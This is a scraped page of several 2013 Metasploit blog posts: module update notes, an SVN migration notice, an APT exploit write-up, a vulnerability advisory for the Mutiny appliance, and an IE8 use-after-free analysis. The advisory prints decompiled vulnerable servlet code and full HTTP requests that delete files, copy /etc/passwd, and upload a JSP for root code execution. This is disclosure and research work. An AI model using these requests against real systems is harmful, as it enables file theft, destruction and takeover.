Skip navigation
All Places > Metasploit > Blog
16 17 18 19 20 Previous Next


648 posts

Stable is for Suckers!

Today on the Freenode IRC channel #metasploit, a user was asking about our old SVN repository for "unstable" Metasploit modules. He was lamenting its loss, since we recently shut down our SVN services (described in this blog post on May 22, 2013).


Fear not, danger-seekers! "Unstable" does live on in the form of a GitHub branch. You can check it out at, and take a look at the unstable-modules directory. Most of the modules in there ran into some kind of trouble in testing or are too unreliable to package up and ship in Metasploit proper. But who knows? Opening up the unstable-modules directory is like buying a mystery box at auction, so you might find a lost treasure, or a mass of half-rotten comicbooks. If you're interested in that sort of thing, just be sure to check the history of the module in question to understand what all happened with it. This is usually pretty easy by reading the commit history and contacting the original author.


Another source for interesting-but-unshipped modules is Rob @mubix Fuller's Q Repository. Oftentimes, things that don't quite fit with the Metasploit main distro will end up here. I am totally on board with someone other than Rapid7 maintaining alternate streams of free, open source, unencumbered Metasploit modules. After all, why should we have all the fun spreading open source cheer around the Internet?


If you're after these modules for reasons beyond mere intellectual curiosity -- like, you actually want to use them -- all you need to do is create a directory structure like $HOME/.msf4/modules/auxiliary/test (or exploits/test, post/test, etc), and drop them in. You can change the name "test" to whatever you like, but you must declare what sort of module it is in the path. When you run msfconsole, those modules will be scooped up, and ready to use. Naturally, your mileage may vary, and there is certainly no guarantee that these modules are safe and appropriate for your network, but hey, stable is for suckers!


Heavy-handed UPnP Mitigation

Hey, remember that time HD Moore talked about all the zillions of UPnP devices that have broken implementations and vulnerable to remote exploitation? Yeah, that was pretty fun. Of course, it's less funny if you are responsible for some of these devices in your network. Is the ownership of these devices in your network unclear? Are they business critical, or not? Sometimes, it's hard to tell.


In my more Lawful Evil moments, it occurs to me that pretty much the fastest way to ferret out ownership of a device is to kick it offline and then find out who squawks. To that end, we have a Denial of Service module that kicks MiniUPnP 1.0 devices offline by exercising CVE-2013-0229, thanks to community contributor Dejan Lukan's implementation of HD's vulnerability discovery.


DoSes certainly can attract attention to a problem implementation. If the device is important enough to keep online, it's probably important enough to protect through some mind of mitigating strategy. Should you really DoS critical industrial control equipment that happens to have a single-packet kill vulnerability? Maybe the better question to ask is, "Is it better to wait for a bad guy to knock this industrial control gear offline on his schedule, or should I do it on my schedule?" Something to think about, anyway.


GNU AWK Bind and Reverse Shells

Once upon a time, the advice to system administrators hardening DMZ-based servers was to yank useful developer tools from those machines, since post-compromise, an attacker could use them to extend control. What this meant, at the time, was that you wouldn't want to have gcc or some other compiler installed on your web server, because you don't want to allow attackers to compile shells and backdoors and stuff like that locally. You'd also want to remove (or at least limit) interpreters like Perl or Python, for largely the same reasons.

I'm not entirely convinced that this is realistic advice; it would be difficult for a system administrator to perform job functions without some kind of programming help. And in this day and age of DevOps, where configuration management is increasingly the job of interpreted languages, the benefits of stripping system tools off a server may just not stack up to the cost of not having them there when you need them legitimately.


That all said, if you happen to run into a CentOS / RedHat based system that is configured by a paranoid, you might want to check if GNU awk is installed (as it is by default). If so, you could leverage this particular flavor of awk and use its built-in socket capabilities to open either a bind shell or reverse shell, thanks to the two new payloads provided by community contributors Roberto Soares and Ulisses Castro. It's at the very least novel, and may avoid IPS/IDS string checkers that are looking for the more traditional Perl and bash-based sockets. And hey, is there really a good reason why I need to be able to bind to a socket with just awk?


New Modules

We've got seven new Metasploit modules this week, not counting the aforementioned AWK payloads. Enjoy!




If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Screen Shot 2013-06-05 at 3.26.46 PM.pngEveryone loves a good cyber-espionage story, and we love to put China under the spotlight.  Why? Because their methods work.  China has some well known hacking groups that have conducted cyber-espionage-oriented attacks, such as the Elderwood Group, Unit 61398, the Nitro gang, etc.  As far as we know, most of these groups tend to use some kind of 0day exploit to gain acces of the targeted organization, and then steal terabytes of data for years.  However, by studying these hacking groups, we also learned that a successful APT doesn't always require an 0day, whatever gets the job done is more than enough, and NetTravler demonstrates just that.


According to a recent research paper by Kaspersky, the Chinese-based hacking group NetTraveler tends to get their victims infected through spear-fishing attacks using exploits that are already publicly known, specifically CVE-2010-3333 and CVE-2012-0158.  Although already patched, these vulnerabilities still remain effective, and are among the most exploited in recent attacks, for example:  Tibetan/Uyghur activists, oil industry companies, scientific research centers, universities, private companies, governments and military contractors, etc.  And of course, they've stolen more than 22+ gigabytes of data because they 1337.


This is all kind of depressing (or amusing?) to hear especially when our memory is still fresh about HD Moore's talk about how many percent of the Internet still remain insecure, and NetTraveler kind of verifies that claim by shoving old exploits in the US government's faces.  Hey guess what?  As a high profile target, you can prevent that.  If you run a system update, your vulnerable software will tell you your stuff is outdated.  If you run a vulnerability scanner, the scanner will tell you you're waiting to be exploited.  If you run a penetration testing framework like Metasploit, shells will be popped, and that should be a red flag for you.


CVE-2012-0158 is a vulnerability in Microsoft Office.  There is a Metasploit module (ms12_027_mscomctl_bof.rb) that specifically targets Office 2007 and Office 2010, written by Wei Chen and Juan Vazquez.  Demo (note: target specific):


Screen Shot 2013-06-05 at 5.43.51 PM.png


CVE-2010-3333 is a vulnerability in Microsoft Word. There is also a Metasploit module (ms10_087_rtf_pfragments_bof.rb) for it targeting Office 2003, 2010, and 2010.  Written by ex-Metasploit Exploit Developer Joshua J. Drake.  Demo:


Screen Shot 2013-06-05 at 5.41.58 PM.png


If you're new to Metasploit and you'd like to try it out, you can download Metasploit for Linux or Windows for free.

Apache Struts Exploit

This week's update includes an exploit for a pretty recent vulnerability in Apache Struts, thanks to community contributor Richard @Console Hicks. The struts_include_param module exercises the vulnerability described at OSVDB 93645, disclosed on May 23, 2013, a bare two weeks ago, and originally discovered by Eric Kobrin and Douglad Rodrigues.


The reason why I bring this up is not just because it's a solid exploit for a recent vulnerability (it is), but also because it illustrates, to a small extent, the Metasploit philosophy of disclosing working, tested exploits pretty much as soon as vulnerabilities are made public.


If you are bothered by this stance, then maybe it's time to drag out a dusty old security meme: Defense in Depth. I know for sure there are IT operations folks out there who believe that there is absolutely nothing they can do in the face of zero-day vulnerabilities. This is a horrible, horrible place to be. The fact is, there are volumes and volumes written on defense in depth: you can segment your network, instrument your servers, keep an eye on egress rules, and generally make life a huge hassle for would-be attackers armed with zero (or 14, or 30) day vulnerabilities that you haven't patched against yet.


I'm heartened that Google appears to have taken a similiar stance on this, with their announced policy of disclosing active, in-the-wild exploits in the interest of public safety. An Internet giant like Google taking an anti-secrecy stance like this is pretty powerful, and I'm looking forward to the next few weeks of vulnerability disclosures from them.


Android Meterpreter

Once, a few weeks back, a fellow named timwr popped into the Metasploit IRC channel on Freenode and complained, rather rudely I might add, "How come there's no Android Meterpreter?" Egypt immediately responded with something along the lines of, "because you haven't written it yet." That, my friends, is how new ports of Meterpreter are made.


Timwr, mihi, and Egypt got together over the next several weeks, and as of May 28 or so, we now have a pretty decent Meterpreter app for Android. Expect a much more whiz-bang blog post on this soon, but in the meantime, it's pretty fun to mess around with it now. We don't have mcuh in the way of Android exploits right now, of course, but that brings me to another topic.


New Payloads

This week's update also includes new payloads for ARM and 64-bit Windows. We've three new payloads, all from community contributor @dcbz32, to create reverse TCP and reverse HTTPS connections, as well as a simple shell payload. Hooray, our ARM support is getting more robust all the time; now if only we could convince people to start writing up decent Android and embedded system exploits...


In addition, we also have a 64-bit Windows payload for reverse HTTPS, from community contributor agix. This has been a long standing feature request, because while in most cases, 32-bit payloads work just fine on 64-bit platforms, this isn't the case 100% of the time. While this payload works like a champ on Windows 7 and related platforms, it most notably is not supported for Windows 8 targets. Something funny is going on in Win8-land specifically, and it's proving squirrelly to nail down. So, good job to Microsoft for making post-exploit development a little bit harder on their latest platform (: . If you happen to have expertise in this area, we'd love to get your input on putting something solid together for Win8 reverse HTTPS connections as shellcode; ideally, we can end up with one payload for both 64-bit platforms.


New Modules

We've five new modules this week, including the Apache Struts exploit. Check 'em below.



If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Nginx Exploit for CVE-2013-2028

The most exciting element of this week's update is the new exploit for Nginx which exercises the vulnerability described by CVE-2013-2028. The Metasploit module was written by Metasploit community contributors hal and saelo, and exploits Greg McManus's bug across a bunch of versions on a few pre-compiled Linux targets. We don't often come across remote, server-side stack buffer overflows in popular software, so when we do, it's kind of a big deal. This is a big deal vulnerability, and hopefully, Internet-facing ops guys all over the world have already fallen all over themselves to fix this.


And yet, recall Jeff Jarmoc's recent findings on the Rails vulnerability, where this critical, remote code execution vulnerability continues to be exploited the wild, five months after disclosure. Now, apply that to what's likely going to happen with this bug, a mere three weeks out from disclosure. Yeah, it's not pretty.


If you're running Nginx, and you haven't applied the patch or the workaround, you are asking for trouble. If you think you've applied the patch or the workaround, or if you don't know if you're running vulnerable version of Nginx or not, you can check your defensive posture with this Metasploit module.


Jettisoning old tests

The update this week also brings a slightly slimmed down version of Metasploit. Way back when, we shipped a couple hundred "unit tests" to exercise some core functionality. While it's true that these testing scripts used the default 'test/unit' library that ships with Ruby, we have since moved on to more complete, thorough testing using Rspec and running every commit through Travis-CI. Also, these old tests haven't been touched, literally, this decade, so bitrot has set in pretty hard.  Few of these tests still work, so it was best to just toss them and move on with rspec.


If you're of a mind to fix or extend core Metasploit functionality, when you write your fix, it would be delightful if you paid attention to the spec/ subdirectory. You can learn a lot from the several hundred example tests that are already there. Being able to prove that your patch actually fixes the problem described makes reviewing your pull request move along much, much faster. Tests can also do double duty as documentation of what you're expecting to happen.


In fact, if you were to write fixes and features following TDD (test-driven design), you'd do something like this:

  • Write an rspec test that fails, because it's hitting a bug or exercising an unwritten feature. Commit that.
  • Write your fix or feature.
  • Run your rspec test again, and see it succeed. Do a little dance and commit that, and send up a pull request.


You will probably uncover more of your feature or fix as you're writing; that's okay, just add another test before you start writing a fix. In this day and age of split windows and featureful IDEs, there's really no reason to avoid this kind of back-and-forth development.


If you want to recover the old tests, it's as simple as checking out Metasploit Framework's unstable branch on GitHub, and running a quick find . -name *\.u[ts]\.rb to locate them. About the only reason I can think of to do this is to port the tests that (used to) cover some core Rex, Railgun, and Meterpreter functionality. In fact, doing just that would make a fine summer past time for you infosec kids who are off for the next couple months.


Testing Metasploit modules is a little different. Ask anyone who knows Ruby pretty well, and they'll agree that Metasploit modules are a little... weird. They also tend to require some very specific, not-very-mockable environmental elements (like functional targets configured with specific vulnerabilities), so the usual rspec route doesn't work out too well with them. We're working on open sourcing some of our QA practices on how to test those as well, though, so stay tuned and keep an eye on the test/modules directory. A bunch of excitement should be landing there soon.


New Modules

In addition to the Nginx vulnerabilitu, we've got new modules for Firefox, IBM SPSS, and Adobe Reader.




If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Metasploit 4.6.1 Released

This week's update bumps the patch version of Metasploit to 4.6.1 (for installed versions of Metasploit). The major change here is the ability to install Metasploit on Windows 8 and Windows Server 2012. That meant we had to fiddle with the installer and a few of Metasploit Pro's dependencies to get that all working correctly, and that led to skipping last week's release so we could be sure all the moving parts lined up correctly.


This release also fixes a few minor issues in Metasploit Pro that affected a handful of users -- you can read up on what exactly has changed in the release notes. As usual, it's a little bigger than you might expect from your typical update, given the changes in the installer code, so give it a couple extra minutes to download and do its update thing.


Intern Found!

If you've been watching this space, you'll know that we've been on the prowl for a summer intern. Welp, the search is over -- we've managed to pick up a well-qualified college student who has a strong background in both IT ops and exploit dev. If you have Pull Requests in the metasploit-framework backlog, or aging bugs in the Redmine Issue Tracker, then you should expect to meet him soon as he validates your pulls and bugs and gets your stuff back on track (or mercilessly axed).


Of course, this sort of backlog validation doesn't have to land on in paid intern's lap. If you're looking to beef up your resume, know a thing or two about IT security and Ruby, and are handy with VMware or Vagrant, you are more than welcome to throw in as well. We can always use extra validation inputs to our bugs and PR's. Even if you're not here in the Mazes of Metasploit, fixing bugs and getting your name attached to Metasploit commits is a pretty decent reference all by itself, paid or not.


SVN is Still Mostly Dead

This week we've locked up our SVN server at with a pretty unguessable username and password. This is to discourage people from following the piles of pre-2011 documentation that's out there. The SVN lockdown is described at in more detail, but the moral of the story is, don't even try to guess the password, and don't try to use your e-mail password or GitHub password or anything like that. The whole point of this new behavior is to merely transmit the instructions to move to Git in the WWW-Authenticate header.


New Modules

We've a fairly huge bucket full of exploits and auxiliary modules this week. Sixteen total, mostly around our 2013 theme of home access points and SAP installations. We're also shipping Juan's 1Day exploit for Mutiny appliances this week, as well as an exe dropper for SSH sessions from Spencer McIntyre and Brandon Knight.


Oh, and did you hear about the Linode compromise? Part of the incident centered around recent ColdFusion bugs. Now, I'm sure ColdFusion is a delightful language to work in and if you're CFM artiste, you probably have a ball every day working on your codebase. That said, it's not super popular language here in the 21st Century. This usually means that you're stuck with legacy-flavored security bugs, like the directory traversal vulnerability exercised by Hack The Planet and ported to Metasploit by Wei @_sinn3r Chen.




If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

TL;DR: Please stop using SVN with

svn co

and start using the GitHub repo with

git clone git://


As of today, a few of you may notice that an attempt to update Metasploit Framework over SVN (instead of git or msfupdate) results in an authentication request. If you try to SVN checkout on Windows, using TortoiseSVN, you will see a pop up much like this:




For command line people, if you try to 'svn co' or 'svn up' your checkout of Metasploit Framework you will read:


$ svn up Updating '.':
Authentication realm: <> =[ MSF must be updated via GitHub

or a more recent msfupdate. See for more ]=

Password for 'yourname':


Please don't try any passwords you think you know. We've locked up SVN and we're using the authentication realm to communicate the correct update path to humans in a way readable by human eyeballs. The password prompt is incidental. If you've read this far, you might wonder why we're doing this.


On November 10, 2011, we moved our source control to GitHub, and we've been bugging people to use git instead of SVN ever since. However, the Internet exists in an eternal present tense. There are thousands and thousands documents, blog posts, books, and articles on 'Getting Started with Metasploit' in practically every human language spread all over the world, both on and offline, some of which we control, most of which we don't. If you don't believe me, just search for "svn co" metasploit.

Because of this, we're not ready to turn off SVN completely -- throwing a 404 error on an update will just generate more (than usual) complaints on Twitter, IRC, and mailing lists about 'svn co' and 'svn up' being broken. Those complaints are still happening today, so it's clear that some people are still stuck with way-out-of-date documentation. Hopefully, those folks will read the instruction in the HTTP authentication realm, since that's about the only way we can communicate with SVN-only clients.


If you are still on SVN, then converting to GitHub works like this:


  1. Don't try to use a password; if by some miracle you happen to guess a correct one, your prize is that you get some messed up, out of date SVN-sourced code. (:
  2. Delete your SVN checkout of Metasploit: rm -rf $HOME/metasploit (or the real path to your checkout).
  3. Clone the latest from GitHub: git clone --depth=1 git:// metasploit (or the path where you want the clone).
  4. Go to your new Metasploit checkout, and run msfupdate: cd metasploit; ./msfupdate (this will get the bundle of Ruby gems together for you).

If you can't use the git:// URI handler, then use https:// instead. It's somewhat slower, but still a million times better than SVN. If bundler complains about gem dependencies, then check to make sure that you have a reasonable version of Ruby -- 1.9.3 is ideal. 1.8.x is out. 2.0.0 should be okay, but it's not vetted for prime time yet.

That's it. Everything will work as before -- your custom modules that you stashed in $HOME/.msf4/modules will be picked up, you will be gleefully tracking Metasploit's bleeding edge source branch, and now, your checkouts won't take hours and crash out on you.


If you use Metasploit Community, Metasploit Express, or Metasploit Pro, then basically none of this applies to you -- msfupdate was converted in Metasploit 4.5 to use use weekly updates, which means you're getting the benefit of both Rapid7 QA and community testing without bothering with git or SVN.


Below, you can find a smattering of documents and posts regarding msfupdate and tracking the Framework source, which will provide more detail on various aspects of the continuous state of Metasploit development. If your setup is not the simple case described here, you will probably find what you need in one of these documents:


Metasploit Development Environment · (metasploit-framework wiki)

Git while the gitting is good

Metasploit Moves from SVN to Git/GitHub

Update to the Metasploit Updates and msfupdate

Activating Metasploit to fix msfupdate: Start to Finish

Back in March we published an exploit module for Mutiny Remote Code Execution. Mutiny "is a self-contained appliance for monitoring network-attached devices such as servers, switches, routers and printers. It has been designed to be simple to use, being aimed at the person who is more interested in the actual data gathered rather than the science of gathering the data." (Source: Mutiny User Guide). That module abused CVE-2012-3001, a command injection issue in the frontend application which allowed any authenticated user, with access to the admin interface, to execute os commands with root privileges. While developing that exploit, we took a look at the last version of the Mutiny FrontEnd available at that time (5.0-1.07) and found others issues, grouped under CVE-2013-0136, which have the plus of being exploitable from any authenticated role.


Vulnerabilities Summary


The Mutiny Appliance provides a Web Frontend, where the users can configure the system and monitor the data collected by the appliance. The Frontend provides four access roles: “Super Admin”, “Administrator”, “Engineer” and “View only”. All the roles allow the user to access to the “Documents” section, where multiple weaknesses have been detected allowing

  • To delete any file from the remote file system with root privileges.
  • To copy and move files in the remote file system with root privileges, allowing also to download/retrieve these files.
  • To upload arbitrary files to the remote file system and ultimately execute arbitrary code with root privileges.


Disclosure Timeline


2013-03-08Initial discovery by Juan Vazquez, Metasploit Researcher
2013-03-09Draft advisory and Metasploit module written
2013-03-11Initial disclosure to the vendor, Mutiny Technology

Follow-up with vendor

2013-03-27Disclosure to CERT/CC
2013-05-14Version 5.0-1.11 tested and not vulnerable to the disclosed exploitation (1)
2013-05-15Public Disclosure
2013-05-15Metasploit exploit module published


(1) Prior to public disclosure the last version available has been tested and the disclosed exploit techniques don't work anymore. The tested version has been "5.0-1.11 (EAGLe) - (02-05-13)". Since the vendor didn't warn us about the patch neither asked us to review the patch we can't assure the current patch is 100% confident and secure, neither have details about revisions between 5.0.1-07 and 5.0.1-11 which could be vulnerable. We encourage you to use the current Metasploit modules in order to test your Mutiny installation for the disclosed vulnerabilities.


Technical Analysis


The Web Frontend of Mutiny is provided in part by a Java Web Application. This frontend provides a "Documents" section for authenticated users for any role:



The Documents functions are in part provided by a servlet named "EditDocument". This servlets provides several "Documents" functions such as upload, copy, move and delete documents:


protected void doPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
  throws ServletException, IOException
  s = httpservletrequest.getParameter("operation");
  s = "UPLOAD";
  if(!s.equals("NEW")) goto _L2; else goto _L1
  if(!s.equals("RENAME")) goto _L5; else goto _L4
  if(!s.equals("DELETE")) goto _L7; else goto _L6
  if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8


  • The UPLOAD operation can be abused via a Directory Traversal vulnerability in the “uploadPath” parameter  to upload arbitrary file and contents to the remote filesystem with root privileges:


  ServletFileUpload servletfileupload = new ServletFileUpload(new DiskFileItemFactory());
  List list = null;
  list = servletfileupload.parseRequest(httpservletrequest);
  catch(FileUploadException fileuploadexception)
  String s6 = null;
  FileItem fileitem = null;
  Iterator iterator = list.iterator();
  FileItem fileitem1 = (FileItem);
  if(fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadPath"))
  s6 = fileitem1.getString(); // User controlled
  if(!fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadFile"))
  fileitem = fileitem1; // User controlled
  } while(true);
  if(s6.length() == 0)
  System.out.println("Error: uploadPath not set.");
  s6 = "/documents";
  if(fileitem == null)
  System.out.println("Error: uploadFile not set.");
  } else
  File file5 = new File(DocumentUtils.root, s6); // Directory Traversal
  File file7 = new File(file5, fileitem.getName());
  file7 = DocumentUtils.getUniqueFile(file7, false);
  fileitem.write(file7); // Write file
  if(file7.exists() && file7.length() == fileitem.getSize())
  flag = true;
  System.out.println((new StringBuilder()).append(s).append(": ").append(file7.getPath()).toString());
  catch(Exception exception)


  • The DELETE operation is also affected by a directory traversal vulnerability in the “paths[]” parameter, which allows to delete arbitrary files with root privileges:


        if(!s.equals("DELETE")) goto _L7; else goto _L6
        String as1[] = httpservletrequest.getParameterValues("paths[]"); // User controlled
        String as2[] = as1;
        int j = as2.length;
        for(int k = 0; k < j; k++)
            String s7 = as2[k];
            File file6 = new File(DocumentUtils.root, s7); // Directory Traversal
                FileUtils.deleteDirectory(file6); // Delete directory
                flag = file6.delete(); // Delete file
                System.out.println((new StringBuilder()).append("DELETE: ").append(file6.getPath()).toString());


  • Also the CUT and COPY operation is also affected by directory traversal vulnerabilities in the “paths[]” and “newPath” parameters, which allows to copy and move files around the remote file system with root privileges:


        if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8
        File file2;
        String as3[];
        String s4 = httpservletrequest.getParameter("newPath");
        file2 = new File(DocumentUtils.root, s4); // Directory Traversal in newPath
        as3 = httpservletrequest.getParameterValues("paths[]");
        if(as3 == null) goto _L3; else goto _L10
        String as4[];
        int l;
        int i1;
        as4 = as3;
        l = as4.length;
        i1 = 0;
        File file8;
        File file9;
        FileInputStream fileinputstream;
        FileOutputStream fileoutputstream;
        if(i1 >= l)
            break; /* Loop/switch isn't completed */
        String s8 = as4[i1];
        file8 = new File(DocumentUtils.root, s8); // Directory traversal in paths[]
        file9 = new File(file2, file8.getName()); // Directory traversal in newPath
        file9 = DocumentUtils.getUniqueFile(file9, file8.isDirectory());
            System.out.println((new StringBuilder()).append(s).append(": ").append(file9.getPath()).toString());
            flag = file8.renameTo(file9); // CUT operation affected by directory traversals
            break MISSING_BLOCK_LABEL_881;
            break MISSING_BLOCK_LABEL_881;
        fileinputstream = null;
        fileoutputstream = null;
        fileinputstream = new FileInputStream(file8); // COPY operationaffected by directory traversals
        fileoutputstream = new FileOutputStream(file9);
        byte abyte0[] = new byte[4096];
        int j1;
        while((j1 = > 0)
            fileoutputstream.write(abyte0, 0, j1);
        flag = true;
        break MISSING_BLOCK_LABEL_881;
        Exception exception1;
        break MISSING_BLOCK_LABEL_881;
        Exception exception2;
        throw exception2;
        if(true) goto _L11; else goto _L3




After examining the “doPost()” function from the “EditDocument” servlet,  requests to abuse these functions have been built.


DELETE operation


The next request allows deleting an arbitrary file from the filesystem:


POST /interface/EditDocument HTTP/1.1


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17

Content-Length: 76

Accept: */*


X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded


Accept-Language: en-us

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D

Connection: keep-alive

Proxy-Connection: keep-alive






In this case the “/test.msf” will be deleted in the remote file system. The 4 level traversal is due to “DocumentUtils.root” by default pointing to “/var/MUTINY/upload/documents” in the Linux based appliance.


The response to the request informs if the file deletion has been successful:


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

X-UA-Compatible: IE=10

Content-Type: application/json;charset=UTF-8

Content-Length: 16

Date: Fri, 08 Mar 2013 02:16:18 GMT





COPY operation


The copy operation allows copying arbitrary files in the remote file system with root privileges. By copying arbitrary files to the default web root in the appliance it’s possible to retrieve arbitrary files.


The next request allows copying the “/etc/passwd” file to the web root for mobile devices, by default located at “/usr/jakarta/tomcat/webapps/ROOT/m” in the Mutiny Linux based appliance:


POST /interface/EditDocument HTTP/1.1


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17

Content-Length: 111

Accept: */*


X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded


Accept-Language: en-us

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=14CE95F1ED56321B4B226DF669D691C0; JSESSIONIDSSO=FA98603965548C3FB1F67BC5121A75DC

Connection: keep-alive

Proxy-Connection: keep-alive






The response to the request informs if the file deletion has been successful:


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

X-UA-Compatible: IE=10

Content-Type: application/json;charset=UTF-8

Content-Length: 16

Date: Fri, 08 Mar 2013 04:11:17 GMT






By accessing to http://appliance/m/passwd is possible to retrieve the remote file:



UPLOAD operation


The upload operation allows uploading an arbitrary file to the file system with root privileges. By uploading a JSP file to the “/usr/jakarta/tomcat/webapps/ROOT/m” default location, arbitrary Java can be executed with root privileges by later invoking the JSP file via the web interface. The next request allows uploading JSP code to the "/usr/jakarta/tomcat/webapps/ROOT/m/msf.jsp” location:


POST /interface/EditDocument HTTP/1.1


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17

Content-Length: 491

Accept: */*


X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPxNcR2XfK8d5gMeU


Accept-Language: en-us

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D

Connection: keep-alive

Proxy-Connection: keep-alive





Content-Disposition: form-data; name="uploadFile"; filename="msf.jsp"

Content-Type: application/octet-stream





        <head><title>Metasploit Test Page</title></head>


                <font size="10"><%="Metasploit Test" %></font>






Content-Disposition: form-data; name="uploadPath"







The response to the request informs if the file upload has been successful:


By accessing to http://appliance/m/msf.jsp is possible to execute the uploaded JSP code:




Metasploit modules


In order to assist vulnerability testing two modules for the Metasploit framework have been developed.




The “mutiny_frontend_read_delete” is an auxiliary module which abuses the DELETE and COPY operations to retrieve or delete arbitrary files from the remote system:


  • Reading /etc/passwd




  • Deleting remote files






The "mutiny_frontend_upload" is an exploit module which abuses the UPLOAD operation to upload an arbitrary JSP code and an arbitrary payload embedded in an ELF file. The last one is executed through the invocation of the JSP stager:




Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Recently, the U.S. Department of Labor website was compromised and had been serving malicious code, capable of detecting and disabling some antivirus products such as Avira, F-Secure, Kaspersky, AVG, Sophos, etc.  It would also attack Internet Explorer 8 users with an 0-day exploit.  The Metasploit vulnerability research community was particularly interested in the exploit part, therefore that's what we'd like to talk about in this blog. Understanding how the evolving browser security landscape operates is key to formulating defense strategies, after all.


First off, according to Microsoft's advisory, only Internet Explorer 8 is vulnerable to this exploit, and we verified that with a fully patched Windows 7 with IE8.  If you are looking for an excuse to upgrade to something more recent, the following image demonstrates IE8's weakness:

Screen Shot 2013-05-04 at 11.44.20 PM.png

Some people say this is a CVE-2012-4792 (a patched vulnerability), we beg to differ.  CVE-2012-4792 is a cbutton use-after-free, but the DoL exploit doesn't use this object at all (Exodus has an excellent writeup about that vulnerability).  Instead, a mshtml!CGenericElement::`vtable' is created while appending a datalist element:


Allocating 0x4C bytes from InsertElementInternal: 0x0563cfb0
0:008> !heap -p -a poi(0x0563cfb0)
    address 06a99fc8 found in
    _DPH_HEAP_ROOT @ 151000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 5087390:          6a99fc8               38 -          6a99000             2000
    7c918f01 ntdll!RtlAllocateHeap+0x00000e64
    635db42e mshtml!CGenericElement::CreateElement+0x00000018
    635a67f5 mshtml!CreateElement+0x00000043
    637917c0 mshtml!CMarkup::CreateElement+0x000002de
    63791929 mshtml!CDocument::CreateElementHelper+0x00000052
    637918a2 mshtml!CDocument::createElement+0x00000021
    635d3820 mshtml!Method_IDispatchpp_BSTR+0x000000d1
    636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1
    63643595 mshtml!CBase::InvokeEx+0x00000025
    63643832 mshtml!DispatchInvokeCollection+0x0000014b
    635e1cdc mshtml!CDocument::InvokeEx+0x000000f1
    63642f30 mshtml!CBase::VersionedInvokeEx+0x00000020
    63642eec mshtml!PlainInvokeEx+0x000000ea
    633a6d37 jscript!IDispatchExInvokeEx2+0x000000f8
    633a6c75 jscript!IDispatchExInvokeEx+0x0000006a
    633a9cfe jscript!InvokeDispatchEx+0x00000098


And freed during garbage collection:

0:008> !heap -p -a poi(0x0563cfb0)
    address 06a99fc8 found in
    _DPH_HEAP_ROOT @ 151000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    5087390:          6a99000             2000
    7c927553 ntdll!RtlFreeHeap+0x000000f9
    636b52c6 mshtml!CGenericElement::`vector deleting destructor'+0x0000003d
    63628a50 mshtml!CBase::SubRelease+0x00000022
    63640d1b mshtml!CElement::PrivateRelease+0x00000029
    6363d0ae mshtml!PlainRelease+0x00000025
    63663c03 mshtml!PlainTrackerRelease+0x00000014
    633a10b4 jscript!VAR::Clear+0x0000005c
    6339fb4a jscript!GcContext::Reclaim+0x000000ab
    6339fd33 jscript!GcContext::CollectCore+0x00000113
    63405594 jscript!JsCollectGarbage+0x0000001d
    633a92f7 jscript!NameTbl::InvokeInternal+0x00000137
    633a6650 jscript!VAR::InvokeByDispID+0x0000017c
    633a9c0b jscript!CScriptRuntime::Run+0x00002989
    633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack+0x000000ff
    633a59f7 jscript!ScrFncObj::Call+0x0000008f
    633a5743 jscript!CSession::Execute+0x00000175


Even though the CGenericElement vftable is freed, the reference is stil kept:

0:008> dc 0x0563cfb0; .echo; dc poi(0x0563cfb0)
0563cfb0  06a99fc8 00000000 ffff0075 ffffffff  ........u.......
0563cfc0  00000071 00000000 00000000 00000000  q...............
0563cfd0  00000000 0563cfd8 00000152 00000001  ......c.R.......
